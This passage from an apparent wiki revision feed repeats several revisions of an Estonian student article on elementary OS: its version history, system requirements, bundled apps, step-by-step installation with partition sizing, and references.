&lt;br /&gt;
Vaba kettaruumi kujutab endast Device tulbas free space rida. Alustuseks loome root partitsiooni: klõpsa free space reale ja vajuda Add… &lt;br /&gt;
&lt;br /&gt;
[[File:In3.jpg|500px|Valik4]] &lt;br /&gt;
&lt;br /&gt;
Järgnevalt vali root-i suurus (hea valik langeb 2GB ja 8GB vahele), märgi failisüsteemiks ext4 ja ja mount point-iks / (ehk root).&lt;br /&gt;
&lt;br /&gt;
[[File:In6.png|500px|Valik5]] &lt;br /&gt;
&lt;br /&gt;
Pärast seda loome swap partitsiooni. Üldine soovitus on, et swap suurus võiks olla 50% kuni 100% füüsilise RAM-i suurusest.&lt;br /&gt;
&lt;br /&gt;
[[File:In5.png|500px|Valik6]] &lt;br /&gt;
&lt;br /&gt;
Ning viimasena loome Home partitsiooni. Home-le tuleks kõige rohkem ruumi anda, sest see on koht, kuhu hakatakse üldiselt kõiki meie faile jms talletama. &lt;br /&gt;
&lt;br /&gt;
[[File:In7.png|500px|Valik7]] &lt;br /&gt;
&lt;br /&gt;
Pärast edukat Root, Swap ja Home partitsioonide loomist tuleb vajutada Install Now.&lt;br /&gt;
&lt;br /&gt;
[[File:In8.jpg|500px|Valik8]]&lt;br /&gt;
&lt;br /&gt;
==== Samm 6: Trivaalsete juhendite jälgimine  ====&lt;br /&gt;
&lt;br /&gt;
Märkida tuleb ära asukoht, kus me parasjagu oleme, klaviatuuri asetus ning anda masinale nimi ja luua sisse logimiseks kasutaja.&lt;br /&gt;
Kui paigaldamine on lõppenud, ilmub järgnev aken:&lt;br /&gt;
&lt;br /&gt;
[[File:In9.png|500px|Valik9]]&lt;br /&gt;
&lt;br /&gt;
Soovituslik oleks teha masinale restart.&lt;br /&gt;
&lt;br /&gt;
==&#039;&#039;&#039;Kokkuvõte&#039;&#039;&#039;== &lt;br /&gt;
&lt;br /&gt;
elementary OS märksõnadeks võiksid olla: kasutuslihtsus, kergus ja minimalistlik disain ehk teisisõnu on tegu trendika Linuxi distroga. Minu tähelepanek: töölaua keskkonnal Pantheon-il on mõningaid ühiseid jooni just funktsioneerimise ja visuaalse poole pealt Mac OS X-I ja GNOME Shell-iga.&lt;br /&gt;
 &lt;br /&gt;
Miks ma just selle teema valisin? Lauaarvuti, mis tänaseks juba rohkem kui 1.5 aastat niisama laua peal seisnud ja tolmu kogunud on, jooksutab ilmselt eOS-i esimest versiooni Jupiteri (parimal juhul Luna beta 1-te), ent millegipärast ei jõudnudki ma kunagi sellega tutvust sobitada. See on ka üks põhjuseid, miks valisin just teemaks Elementary OS-i, et ise rohkem aimu saada, mis mul laua peal seisab ja samas kuuldu järgi tundus, et tegu on üsnagi jätkusuutliku projektiga- iga-aastaselt on seni katsutud uue versiooniga välja tulla ja ehk on lootust, et sellest areneb ühel päeval midagi suurematki välja.&lt;br /&gt;
&lt;br /&gt;
==&#039;&#039;&#039;Linke külastamiseks&#039;&#039;&#039;== &lt;br /&gt;
&lt;br /&gt;
*eOS – mitte ainult vaese mehe Apple: http://www.techrepublic.com/article/elementary-os-not-just-the-poor-mans-apple/&lt;br /&gt;
&lt;br /&gt;
*Ühe kasutaja kogemus Pantheoniga: http://www.networkworld.com/article/2599415/opensource-subnet/the-linux-desktop-a-week-review-elementary-oss-pantheon.html&lt;br /&gt;
&lt;br /&gt;
*20 asja, mida pärast eOS Luna paigaldamist teha: http://www.binarytides.com/better-elementary-os-luna/&lt;br /&gt;
&lt;br /&gt;
*15 asja, mida pärast eOS Freya beta 1 paigaldamist teha: http://lmelinux.net/2014/09/15/things-installing-elementary-os-freya-beta/&lt;br /&gt;
&lt;br /&gt;
*Ülemise paneeli kujundamine: http://ubuntuhandbook.org/index.php/2013/10/customize-elementaryos-panel/&lt;br /&gt;
&lt;br /&gt;
*Synapse Indicator: http://www.webupd8.org/2013/06/synapse-indicator-new-search.html&lt;br /&gt;
&lt;br /&gt;
*Dokk-i muutmine: http://rhoconlinux.github.io/plank-themer/&lt;br /&gt;
&lt;br /&gt;
==&#039;&#039;&#039;Kasutatud kirjandus&#039;&#039;&#039;== &lt;br /&gt;
&lt;br /&gt;
[1] http://elementaryos.org/journal/luna-beta-1-released&lt;br /&gt;
&lt;br /&gt;
[2] http://www.askvg.com/elementary-os-jupiter-awesome-linux-distribution-based-on-ubuntu/&lt;br /&gt;
&lt;br /&gt;
[3] http://elementaryos.org/journal/5-myths-about-elementary&lt;br /&gt;
&lt;br /&gt;
[4] http://www.muylinux.com/2012/10/19/elementary-os-jupiter-deja-de-estar-disponible&lt;br /&gt;
&lt;br /&gt;
[5] http://www.webupd8.org/2012/10/elementary-os-jupiter-no-longer.html&lt;br /&gt;
&lt;br /&gt;
[6] http://www.webupd8.org/2012/11/elementary-os-luna-beta-1-available-for.html&lt;br /&gt;
&lt;br /&gt;
[7] http://www.phoronix.com/scan.php?page=news_item&amp;amp;px=MTM2NjA&lt;br /&gt;
&lt;br /&gt;
[8] http://www.muktware.com/2013/08/09/mysterious-countdown-appears-on-elementary-os-website/4557/&lt;br /&gt;
&lt;br /&gt;
[9] https://lists.launchpad.net/elementary-dev-community/msg02577.html&lt;br /&gt;
&lt;br /&gt;
[10] http://elementaryos.org/journal/elementary-os-isis-is-now-freya&lt;br /&gt;
&lt;br /&gt;
[11] http://elementaryos.org/journal/freya-beta-1-available-for-developers-testers&lt;br /&gt;
&lt;br /&gt;
[12] http://elementaryos.org/docs/user-guide/technical-specifications&lt;br /&gt;
&lt;br /&gt;
[13] http://itsfoss.com/guide-install-elementary-os-luna/&lt;br /&gt;
&lt;br /&gt;
==&#039;&#039;&#039;Autor&#039;&#039;&#039;== &lt;br /&gt;
&lt;br /&gt;
Nimi: Kelly Tragel&lt;br /&gt;
&lt;br /&gt;
Rühm: A21&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Elementary_OS_paigaldamine&amp;diff=86366</id>
		<title>Elementary OS paigaldamine</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Elementary_OS_paigaldamine&amp;diff=86366"/>
		<updated>2015-01-15T12:30:35Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* elementary OS paigaldamine */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Category: Operatsioonisüsteemide administreerimine ja sidumine]]&lt;br /&gt;
&lt;br /&gt;
==&#039;&#039;&#039;Mis on elementary OS? &#039;&#039;&#039;== &lt;br /&gt;
&lt;br /&gt;
[[File:Luna.png|thumb|right|350px|elementary OS &amp;quot;Luna&amp;quot;]] &lt;br /&gt;
&lt;br /&gt;
elementary OS (edaspidi eOS) on Ubuntul baseeruv Linuxi distributsioon. Selle peamine erinevus võrreldes Ubuntuga on, et kui viimane kasutab töölauakeskkonnana Unity-t, siis eOS-le on kirjutatud päris 0-st üles oma kasutajaliides- Pantheon. See on hästi lõimitud spetsiaalselt eOS-le  loodud rakendustega nagu Plank (kiirkäivitusriba), Midori (vaikimisi veebibrauser) ja Scratch (lihtne teksti redigeerimise tööriist). [1]&lt;br /&gt;
&lt;br /&gt;
==&#039;&#039;&#039;Visioon ja taust&#039;&#039;&#039;== &lt;br /&gt;
&lt;br /&gt;
Liikvel olevate eksiarvamuste tagasi lükkamiseks tuleb öelda, et eOS ei ole lihtsalt kamba arendajate poolt loodud kujundus, mida Ubuntu all nn programmi näol käivitada saaks. eOS sai küll alguse teemade ja rakenduste komplektist, mis olid algselt mõeldud Ubuntule, kuid ajaga kasvas sellest siiski välja täiesti uus distributsioon. Jäädes aga seejuures Ubuntu põhiseks, ühilduvad viimase repositooriumid ja paketid täielikult eOS-ga. [2]&lt;br /&gt;
&lt;br /&gt;
Kasutajaliides Pantheon on saanud oma praeguse kuju ajast, mil arendusmeeskond pärast Jupiteri välja laskmist leidis, et kasutajakogemuse parandamiseks tuleks töölaua keskkond uuel moel üles ehitada. GNOME-lt kisti küljest kõik, mida ei tahetud ega peetud vajalikuks ning vahetati välja uute, omalt poolt ehitatud asendustega. Pantheon-i eesmärgiks on seatud olla intuitsioonil põhinev (kergesti hoomatav ja käsitletav), mis ei ehmataks esimese hooga uut kasutajat ära, ega nõuaks ülearust “nuputamist”. [3]&lt;br /&gt;
&lt;br /&gt;
==&#039;&#039;&#039;Versioonid&#039;&#039;&#039;== &lt;br /&gt;
&lt;br /&gt;
Esimene stabiilne versioon eOS-st kandis nime Jupiter ning tuli välja 31. märtsil 2011. See baseerus Ubuntu 10.10 versioonil, kuid pärast 2012. aasta oktoobrit ei ole enam toestatud ega ka ametlikul kodulehel (http://elementaryos.org/) kättesaadav. [4][5]&lt;br /&gt;
&lt;br /&gt;
Teine versioon eOS-le avaldati 2012. aasta novembris, kuid sel puhul oli tegu beta versiooniga, mis kandis koodnimetust Luna. Luna põhineb Ubuntu 12.04 LTS versioonil. [6] Pea pool aastat hiljem, 6. mai 2013 tuli välja ka Luna teine beta versioon , mis parandas enam kui 300 tarkvaralist viga ning viis sisse ka mitmeid teisi muudatusi. Näiteks laiendas uus versioon regioonide valikut, juurde tuli mitme kuva toetus, sisse viidi visuaalseid täiustusi ning uuendati ühes rakendusi. [6][7] 7. augustil 2013 ilmus ametlikule koduleheküljele stardiloendur, mis lõppes 3 päeva hiljem, 10. augustil,  teise stabiilse versiooni väljalaskmisega. [8][1]&lt;br /&gt;
 &lt;br /&gt;
Kolmanda stabiilse versiooni nimi Isis, sai välja käidud veel sama aasta augustis projekti liidri Daniel Foré poolt. [9] Nimi muudeti hiljem Freya-ks, et vältida sarnasusseost militaristliku grupi ISIS-ega. [10] Esimene beta versioon Freya-st avaldati 11. augustil 2014. aastal ning see toetub Ubuntu 14.04 LTS versioonile. [9][11]&lt;br /&gt;
&lt;br /&gt;
==&#039;&#039;&#039;elementary OS paigaldamine&#039;&#039;&#039;== &lt;br /&gt;
&lt;br /&gt;
Miinimumnõuded arvutile [12]:&lt;br /&gt;
*	1 GHz x86 protsessor&lt;br /&gt;
*	512MB põhimälu (RAM) (soovituslik: 1GB)&lt;br /&gt;
*	5GB vaba kettaruumi (soovituslik: 15GB)&lt;br /&gt;
*	Graafikakaardi ja ekraani lahutusvõime 1024x768&lt;br /&gt;
*	CD/DVD-lugeja või USB-lt bootimise võimalus&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Tarkvara, mis ühes eOS Lunaga kaasa tuleb [12]:&lt;br /&gt;
*	File Roller: arhiivihaldur&lt;br /&gt;
*	Geary: E-posti klient&lt;br /&gt;
*	GNOME Calculator (ehk gcalctool): kalkulaator &lt;br /&gt;
*	Empathy: kiirsuhtlus- ja  Internetitelefoni (VoIP) klient&lt;br /&gt;
*	Maya: kalender&lt;br /&gt;
*	Midori: veebibrauser&lt;br /&gt;
*	Noise: audiomängija&lt;br /&gt;
*	Pantheon Files: failihaldur&lt;br /&gt;
*	Pantheon Terminal: terminaliemulaator&lt;br /&gt;
*	Scratch: tekstiredaktor&lt;br /&gt;
*	Screenshot: kuvatõmmiste tegemise tööriist&lt;br /&gt;
*	Shotwell: fotohaldur&lt;br /&gt;
*	Simple Scan: dokumentide skaneerimise tööriist&lt;br /&gt;
*	Switchboard System Settings: juhtpaneel (funktsioonilt sarnaneb Windowsi Control Panel-ile)&lt;br /&gt;
*	Totem: filmimängija&lt;br /&gt;
*	Ubuntu Software Center: tarkvarahaldur&lt;br /&gt;
*	Update manager: uuendushaldur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
eOS on antud tasuta kasutusse, muidugi võimalusega vabatahtlikel arendusmeeskonda rahaliselt toetada. &lt;br /&gt;
Installatsiooni viisardiks on Ubiquity, mis on tuttav juba Ubuntust ja ühtlasi leiab kasutust ka temast “tuletatud” distributsioonidel. &lt;br /&gt;
(Kõik järgnevad installatsiooni pildid on võetud välisest allikast) [13]&lt;br /&gt;
&lt;br /&gt;
==== Samm 1: Loo Live USB või CD ====&lt;br /&gt;
&lt;br /&gt;
Esmalt tuleks luua Live CD/USB, millega saab eOS-i kas arvutisse installida või vajadusel ka kasutada otseselt ilma süsteemi paigaldamata. Kuidas seda teha, loe täpsemalt [http://www.ubuntu.com/download/desktop/ siit] või [http://elementaryos.org/docs/user-guide/creating-an-install-disk siit].&lt;br /&gt;
&lt;br /&gt;
==== Samm 2: Bootimine ====&lt;br /&gt;
&lt;br /&gt;
Ühenda Live USB või ketas seadmega ja taaskäivita arvuti. Hetkel, mil arvuti end üles bootib, vajuta F10 või F12, et jõuda boot menüüsse. Sealt tuleks valida vastavalt kas USB, CDROM, Removable Media või muud sarnast (rohkem abi [http://elementaryos.org/docs/user-guide/booting-the-install-disk siit]).&lt;br /&gt;
&lt;br /&gt;
==== Samm 3: Alusta paigaldamist ====&lt;br /&gt;
&lt;br /&gt;
Järgnevalt peaks ilmuma installatsiooni aken, kus tuleb ära märkida keel ning valida emma-kumma vahel, kas proovida või paigaldada eOS kohe arvutisse. &lt;br /&gt;
&lt;br /&gt;
[[File:In1.jpg|500px|Valik1]] &lt;br /&gt;
&lt;br /&gt;
Seejärel näidatakse, kas kõik (osa soovituslikke) nõuded on täidetud: vähemalt 4.3GB vaba kettaruumi, olemasolev ühendus vooluallikaga ja Internetiga. Lisaks on võimalus valida, kas installeerida uuendused ühes eOS-i enda paigaldamisega või, kas paigaldada ka ühes kolmandate osapoolte tarkvara. &lt;br /&gt;
&lt;br /&gt;
[[File:In2.jpg|500px|Valik2]]&lt;br /&gt;
&lt;br /&gt;
==== Samm 4: Partitsioonide loomine ====&lt;br /&gt;
&lt;br /&gt;
Tuleb langetada otsus, kas tühjendada kogu kõvaketas ja paigaldada sellele üksnes eOS või luua eOS-le uus partitsioon, et paigaldada see juba näiteks mõne muu olemasoleva operatsioonisüsteemi kõrvale. &lt;br /&gt;
&lt;br /&gt;
[[File:In4.jpg|500px|Valik3]]&lt;br /&gt;
&lt;br /&gt;
==== Samm 5: Loo root, swap ja home  ====&lt;br /&gt;
&lt;br /&gt;
Vaba kettaruumi kujutab endast Device tulbas free space rida. Alustuseks loome root partitsiooni: klõpsa free space reale ja vajuda Add… &lt;br /&gt;
&lt;br /&gt;
[[File:In3.jpg|500px|Valik4]] &lt;br /&gt;
&lt;br /&gt;
Järgnevalt vali root-i suurus (hea valik langeb 2GB ja 8GB vahele), märgi failisüsteemiks ext4 ja ja mount point-iks / (ehk root).&lt;br /&gt;
&lt;br /&gt;
[[File:In6.png|500px|Valik5]] &lt;br /&gt;
&lt;br /&gt;
Pärast seda loome swap partitsiooni. Üldine soovitus on, et swap suurus võiks olla 50% kuni 100% füüsilise RAM-i suurusest.&lt;br /&gt;
&lt;br /&gt;
[[File:In5.png|500px|Valik6]] &lt;br /&gt;
&lt;br /&gt;
Ning viimasena loome Home partitsiooni. Home-le tuleks kõige rohkem ruumi anda, sest see on koht, kuhu hakatakse üldiselt kõiki meie faile jms talletama. &lt;br /&gt;
&lt;br /&gt;
[[File:In7.png|500px|Valik7]] &lt;br /&gt;
&lt;br /&gt;
Pärast edukat Root, Swap ja Home partitsioonide loomist tuleb vajutada Install Now.&lt;br /&gt;
&lt;br /&gt;
[[File:In8.jpg|500px|Valik8]]&lt;br /&gt;
&lt;br /&gt;
==== Samm 6: Trivaalsete juhendite jälgimine  ====&lt;br /&gt;
&lt;br /&gt;
Märkida tuleb ära asukoht, kus me parasjagu oleme, klaviatuuri asetus ning anda masinale nimi ja luua sisse logimiseks kasutaja.&lt;br /&gt;
Kui paigaldamine on lõppenud, ilmub järgnev aken:&lt;br /&gt;
&lt;br /&gt;
[[File:In9.png|500px|Valik9]]&lt;br /&gt;
&lt;br /&gt;
Soovituslik oleks teha masinale restart.&lt;br /&gt;
&lt;br /&gt;
==&#039;&#039;&#039;Kokkuvõte&#039;&#039;&#039;== &lt;br /&gt;
&lt;br /&gt;
elementary OS märksõnadeks võiksid olla: kasutuslihtsus, kergus ja minimalistlik disain ehk teisisõnu on tegu trendika Linuxi distroga. Minu tähelepanek: töölaua keskkonnal Pantheon-il on mõningaid ühiseid jooni just funktsioneerimise ja visuaalse poole pealt Mac OS X-I ja GNOME Shell-iga.&lt;br /&gt;
 &lt;br /&gt;
Miks ma just selle teema valisin? Lauaarvuti, mis tänaseks juba rohkem kui 1.5 aastat niisama laua peal seisnud ja tolmu kogunud on, jooksutab ilmselt eOS-i esimest versiooni Jupiteri (parimal juhul Luna beta 1-te), ent millegipärast ei jõudnudki ma kunagi sellega tutvust sobitada. See on ka üks põhjuseid, miks valisin just teemaks Elementary OS-i, et ise rohkem aimu saada, mis mul laua peal seisab ja samas kuuldu järgi tundus, et tegu on üsnagi jätkusuutliku projektiga- iga-aastaselt on seni katsutud uue versiooniga välja tulla ja ehk on lootust, et sellest areneb ühel päeval midagi suurematki välja.&lt;br /&gt;
&lt;br /&gt;
==&#039;&#039;&#039;Linke külastamiseks&#039;&#039;&#039;== &lt;br /&gt;
&lt;br /&gt;
*eOS – mitte ainult vaese mehe Apple: http://www.techrepublic.com/article/elementary-os-not-just-the-poor-mans-apple/&lt;br /&gt;
&lt;br /&gt;
*Ühe kasutaja kogemus Pantheoniga: http://www.networkworld.com/article/2599415/opensource-subnet/the-linux-desktop-a-week-review-elementary-oss-pantheon.html&lt;br /&gt;
&lt;br /&gt;
*20 asja, mida pärast eOS Luna paigaldamist teha: http://www.binarytides.com/better-elementary-os-luna/&lt;br /&gt;
&lt;br /&gt;
*15 asja, mida pärast eOS Freya beta 1 paigaldamist teha: http://lmelinux.net/2014/09/15/things-installing-elementary-os-freya-beta/&lt;br /&gt;
&lt;br /&gt;
*Ülemise paneeli kujundamine: http://ubuntuhandbook.org/index.php/2013/10/customize-elementaryos-panel/&lt;br /&gt;
&lt;br /&gt;
*Synapse Indicator: http://www.webupd8.org/2013/06/synapse-indicator-new-search.html&lt;br /&gt;
&lt;br /&gt;
*Dokk-i muutmine: http://rhoconlinux.github.io/plank-themer/&lt;br /&gt;
&lt;br /&gt;
==&#039;&#039;&#039;Kasutatud kirjandus&#039;&#039;&#039;== &lt;br /&gt;
&lt;br /&gt;
[1] http://elementaryos.org/journal/luna-beta-1-released&lt;br /&gt;
&lt;br /&gt;
[2] http://www.askvg.com/elementary-os-jupiter-awesome-linux-distribution-based-on-ubuntu/&lt;br /&gt;
&lt;br /&gt;
[3] http://elementaryos.org/journal/5-myths-about-elementary&lt;br /&gt;
&lt;br /&gt;
[4] http://www.muylinux.com/2012/10/19/elementary-os-jupiter-deja-de-estar-disponible&lt;br /&gt;
[4] http://itsfoss.com/guide-install-elementary-os-luna/&lt;br /&gt;
&lt;br /&gt;
[5] http://www.webupd8.org/2012/10/elementary-os-jupiter-no-longer.html&lt;br /&gt;
&lt;br /&gt;
[6] http://www.webupd8.org/2012/11/elementary-os-luna-beta-1-available-for.html&lt;br /&gt;
&lt;br /&gt;
[7] http://www.phoronix.com/scan.php?page=news_item&amp;amp;px=MTM2NjA&lt;br /&gt;
&lt;br /&gt;
[8] http://www.muktware.com/2013/08/09/mysterious-countdown-appears-on-elementary-os-website/4557/&lt;br /&gt;
&lt;br /&gt;
[9] https://lists.launchpad.net/elementary-dev-community/msg02577.html&lt;br /&gt;
&lt;br /&gt;
[10] http://elementaryos.org/journal/elementary-os-isis-is-now-freya&lt;br /&gt;
&lt;br /&gt;
[11] http://elementaryos.org/journal/freya-beta-1-available-for-developers-testers&lt;br /&gt;
&lt;br /&gt;
[12] http://elementaryos.org/docs/user-guide/technical-specifications&lt;br /&gt;
&lt;br /&gt;
==&#039;&#039;&#039;Autor&#039;&#039;&#039;== &lt;br /&gt;
&lt;br /&gt;
Nimi: Kelly Tragel&lt;br /&gt;
&lt;br /&gt;
Rühm: A21&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Elementary_OS_paigaldamine&amp;diff=86365</id>
		<title>Elementary OS paigaldamine</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Elementary_OS_paigaldamine&amp;diff=86365"/>
		<updated>2015-01-15T12:29:51Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* Kasutatud kirjandus */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Category: Operatsioonisüsteemide administreerimine ja sidumine]]&lt;br /&gt;
&lt;br /&gt;
==&#039;&#039;&#039;Mis on elementary OS? &#039;&#039;&#039;== &lt;br /&gt;
&lt;br /&gt;
[[File:Luna.png|thumb|right|350px|elementary OS &amp;quot;Luna&amp;quot;]] &lt;br /&gt;
&lt;br /&gt;
elementary OS (edaspidi eOS) on Ubuntul baseeruv Linuxi distributsioon. Selle peamine erinevus võrreldes Ubuntuga on, et kui viimane kasutab töölauakeskkonnana Unity-t, siis eOS-le on kirjutatud päris 0-st üles oma kasutajaliides- Pantheon. See on hästi lõimitud spetsiaalselt eOS-le  loodud rakendustega nagu Plank (kiirkäivitusriba), Midori (vaikimisi veebibrauser) ja Scratch (lihtne teksti redigeerimise tööriist). [1]&lt;br /&gt;
&lt;br /&gt;
==&#039;&#039;&#039;Visioon ja taust&#039;&#039;&#039;== &lt;br /&gt;
&lt;br /&gt;
Liikvel olevate eksiarvamuste tagasi lükkamiseks tuleb öelda, et eOS ei ole lihtsalt kamba arendajate poolt loodud kujundus, mida Ubuntu all nn programmi näol käivitada saaks. eOS sai küll alguse teemade ja rakenduste komplektist, mis olid algselt mõeldud Ubuntule, kuid ajaga kasvas sellest siiski välja täiesti uus distributsioon. Jäädes aga seejuures Ubuntu põhiseks, ühilduvad viimase repositooriumid ja paketid täielikult eOS-ga. [2]&lt;br /&gt;
&lt;br /&gt;
Kasutajaliides Pantheon on saanud oma praeguse kuju ajast, mil arendusmeeskond pärast Jupiteri välja laskmist leidis, et kasutajakogemuse parandamiseks tuleks töölaua keskkond uuel moel üles ehitada. GNOME-lt kisti küljest kõik, mida ei tahetud ega peetud vajalikuks ning vahetati välja uute, omalt poolt ehitatud asendustega. Pantheon-i eesmärgiks on seatud olla intuitsioonil põhinev (kergesti hoomatav ja käsitletav), mis ei ehmataks esimese hooga uut kasutajat ära, ega nõuaks ülearust “nuputamist”. [3]&lt;br /&gt;
&lt;br /&gt;
==&#039;&#039;&#039;Versioonid&#039;&#039;&#039;== &lt;br /&gt;
&lt;br /&gt;
Esimene stabiilne versioon eOS-st kandis nime Jupiter ning tuli välja 31. märtsil 2011. See baseerus Ubuntu 10.10 versioonil, kuid pärast 2012. aasta oktoobrit ei ole enam toestatud ega ka ametlikul kodulehel (http://elementaryos.org/) kättesaadav. [4][5]&lt;br /&gt;
&lt;br /&gt;
Teine versioon eOS-le avaldati 2012. aasta novembris, kuid sel puhul oli tegu beta versiooniga, mis kandis koodnimetust Luna. Luna põhineb Ubuntu 12.04 LTS versioonil. [6] Pea pool aastat hiljem, 6. mai 2013 tuli välja ka Luna teine beta versioon , mis parandas enam kui 300 tarkvaralist viga ning viis sisse ka mitmeid teisi muudatusi. Näiteks laiendas uus versioon regioonide valikut, juurde tuli mitme kuva toetus, sisse viidi visuaalseid täiustusi ning uuendati ühes rakendusi. [6][7] 7. augustil 2013 ilmus ametlikule koduleheküljele stardiloendur, mis lõppes 3 päeva hiljem, 10. augustil,  teise stabiilse versiooni väljalaskmisega. [8][1]&lt;br /&gt;
 &lt;br /&gt;
Kolmanda stabiilse versiooni nimi Isis, sai välja käidud veel sama aasta augustis projekti liidri Daniel Foré poolt. [9] Nimi muudeti hiljem Freya-ks, et vältida sarnasusseost militaristliku grupi ISIS-ega. [10] Esimene beta versioon Freya-st avaldati 11. augustil 2014. aastal ning see toetub Ubuntu 14.04 LTS versioonile. [9][11]&lt;br /&gt;
&lt;br /&gt;
==&#039;&#039;&#039;elementary OS paigaldamine&#039;&#039;&#039;== &lt;br /&gt;
&lt;br /&gt;
Miinimumnõuded arvutile [12]:&lt;br /&gt;
*	1 GHz x86 protsessor&lt;br /&gt;
*	512MB põhimälu (RAM) (soovituslik: 1GB)&lt;br /&gt;
*	5GB vaba kettaruumi (soovituslik: 15GB)&lt;br /&gt;
*	Graafikakaardi ja ekraani lahutusvõime 1024x768&lt;br /&gt;
*	CD/DVD-lugeja või USB-lt bootimise võimalus&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Tarkvara, mis ühes eOS Lunaga kaasa tuleb [2]:&lt;br /&gt;
*	File Roller: arhiivihaldur&lt;br /&gt;
*	Geary: E-posti klient&lt;br /&gt;
*	GNOME Calculator (ehk gcalctool): kalkulaator &lt;br /&gt;
*	Empathy: kiirsuhtlus- ja  Internetitelefoni (VoIP) klient&lt;br /&gt;
*	Maya: kalender&lt;br /&gt;
*	Midori: veebibrauser&lt;br /&gt;
*	Noise: audiomängija&lt;br /&gt;
*	Pantheon Files: failihaldur&lt;br /&gt;
*	Pantheon Terminal: terminaliemulaator&lt;br /&gt;
*	Scratch: tekstiredaktor&lt;br /&gt;
*	Screenshot: kuvatõmmiste tegemise tööriist&lt;br /&gt;
*	Shotwell: fotohaldur&lt;br /&gt;
*	Simple Scan: dokumentide skaneerimise tööriist&lt;br /&gt;
*	Switchboard System Settings: juhtpaneel (funktsioonilt sarnaneb Windowsi Control Panel-ile)&lt;br /&gt;
*	Totem: filmimängija&lt;br /&gt;
*	Ubuntu Software Center: tarkvarahaldur&lt;br /&gt;
*	Update manager: uuendushaldur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
eOS on antud tasuta kasutusse, muidugi võimalusega vabatahtlikel arendusmeeskonda rahaliselt toetada. &lt;br /&gt;
Installatsiooni viisardiks on Ubiquity, mis on tuttav juba Ubuntust ja ühtlasi leiab kasutust ka temast “tuletatud” distributsioonidel. &lt;br /&gt;
(Kõik järgnevad installatsiooni pildid on võetud välisest allikast [4].)&lt;br /&gt;
&lt;br /&gt;
==== Samm 1: Loo Live USB või CD ====&lt;br /&gt;
&lt;br /&gt;
Esmalt tuleks luua Live CD/USB, millega saab eOS-i kas arvutisse installida või vajadusel ka kasutada otseselt ilma süsteemi paigaldamata. Kuidas seda teha, loe täpsemalt [http://www.ubuntu.com/download/desktop/ siit] või [http://elementaryos.org/docs/user-guide/creating-an-install-disk siit].&lt;br /&gt;
&lt;br /&gt;
==== Samm 2: Bootimine ====&lt;br /&gt;
&lt;br /&gt;
Ühenda Live USB või ketas seadmega ja taaskäivita arvuti. Hetkel, mil arvuti end üles bootib, vajuta F10 või F12, et jõuda boot menüüsse. Sealt tuleks valida vastavalt kas USB, CDROM, Removable Media või muud sarnast (rohkem abi [http://elementaryos.org/docs/user-guide/booting-the-install-disk siit]).&lt;br /&gt;
&lt;br /&gt;
==== Samm 3: Alusta paigaldamist ====&lt;br /&gt;
&lt;br /&gt;
Järgnevalt peaks ilmuma installatsiooni aken, kus tuleb ära märkida keel ning valida emma-kumma vahel, kas proovida või paigaldada eOS kohe arvutisse. &lt;br /&gt;
&lt;br /&gt;
[[File:In1.jpg|500px|Valik1]] &lt;br /&gt;
&lt;br /&gt;
Seejärel näidatakse, kas kõik (osa soovituslikke) nõuded on täidetud: vähemalt 4.3GB vaba kettaruumi, olemasolev ühendus vooluallikaga ja Internetiga. Lisaks on võimalus valida, kas installeerida uuendused ühes eOS-i enda paigaldamisega või, kas paigaldada ka ühes kolmandate osapoolte tarkvara. &lt;br /&gt;
&lt;br /&gt;
[[File:In2.jpg|500px|Valik2]]&lt;br /&gt;
&lt;br /&gt;
==== Samm 4: Partitsioonide loomine ====&lt;br /&gt;
&lt;br /&gt;
Tuleb langetada otsus, kas tühjendada kogu kõvaketas ja paigaldada sellele üksnes eOS või luua eOS-le uus partitsioon, et paigaldada see juba näiteks mõne muu olemasoleva operatsioonisüsteemi kõrvale. &lt;br /&gt;
&lt;br /&gt;
[[File:In4.jpg|500px|Valik3]]&lt;br /&gt;
&lt;br /&gt;
==== Samm 5: Loo root, swap ja home  ====&lt;br /&gt;
&lt;br /&gt;
Vaba kettaruumi kujutab endast Device tulbas free space rida. Alustuseks loome root partitsiooni: klõpsa free space reale ja vajuda Add… &lt;br /&gt;
&lt;br /&gt;
[[File:In3.jpg|500px|Valik4]] &lt;br /&gt;
&lt;br /&gt;
Järgnevalt vali root-i suurus (hea valik langeb 2GB ja 8GB vahele), märgi failisüsteemiks ext4 ja ja mount point-iks / (ehk root).&lt;br /&gt;
&lt;br /&gt;
[[File:In6.png|500px|Valik5]] &lt;br /&gt;
&lt;br /&gt;
Pärast seda loome swap partitsiooni. Üldine soovitus on, et swap suurus võiks olla 50% kuni 100% füüsilise RAM-i suurusest.&lt;br /&gt;
&lt;br /&gt;
[[File:In5.png|500px|Valik6]] &lt;br /&gt;
&lt;br /&gt;
Ning viimasena loome Home partitsiooni. Home-le tuleks kõige rohkem ruumi anda, sest see on koht, kuhu hakatakse üldiselt kõiki meie faile jms talletama. &lt;br /&gt;
&lt;br /&gt;
[[File:In7.png|500px|Valik7]] &lt;br /&gt;
&lt;br /&gt;
Pärast edukat Root, Swap ja Home partitsioonide loomist tuleb vajutada Install Now.&lt;br /&gt;
&lt;br /&gt;
[[File:In8.jpg|500px|Valik8]]&lt;br /&gt;
&lt;br /&gt;
==== Samm 6: Trivaalsete juhendite jälgimine  ====&lt;br /&gt;
&lt;br /&gt;
Märkida tuleb ära asukoht, kus me parasjagu oleme, klaviatuuri asetus ning anda masinale nimi ja luua sisse logimiseks kasutaja.&lt;br /&gt;
Kui paigaldamine on lõppenud, ilmub järgnev aken:&lt;br /&gt;
&lt;br /&gt;
[[File:In9.png|500px|Valik9]]&lt;br /&gt;
&lt;br /&gt;
